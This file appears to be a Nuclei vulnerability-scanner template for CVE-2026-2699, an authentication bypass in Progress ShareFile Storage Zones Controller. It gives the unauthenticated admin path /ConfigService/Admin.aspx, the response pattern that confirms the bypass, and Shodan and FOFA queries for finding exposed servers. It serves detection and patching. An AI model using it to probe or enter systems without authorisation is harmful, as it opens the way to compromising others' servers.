id: CVE-2026-2699 info: name: Progress ShareFile Storage Zones Controller - Authentication Bypass author: DhiyaneshDk severity: critical description: | Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution. impact: | Unauthenticated attackers can change system configuration and potentially execute remote code, leading to full system compromise. remediation: Update ShareFile Storage Zones Controller to version 5.12.4 or later. reference: - https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699 - https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/ - https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-2699 cwe-id: CWE-284 epss-score: 0.31163 epss-percentile: 0.9685 metadata: verified: true max-request: 1 vendor: progress product: sharefile_storage_zones_controller fofa-query: title=="ShareFile Storage Server" shodan-query: title:"ShareFile Storage Server" tags: cve,cve2026,progress,sharefile,auth-bypass flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" host-redirects: true max-redirects: 2 matchers: - type: word part: body words: - "ShareFile Storage Server" internal: true - raw: - | GET /ConfigService/Admin.aspx HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 302' - 'content_length >= 10000' condition: and # digest: 4a0a00473045022100fcf95cc7b524dfaf726a95ed8bbe3993ab3c5a721079cc12a3f556872a7178b402206ff686dc340e2090887aa9b4f0578774a95b9fcfca7569dfe218c144eee8dd07:922c64590222798bb761d5b6d8e72950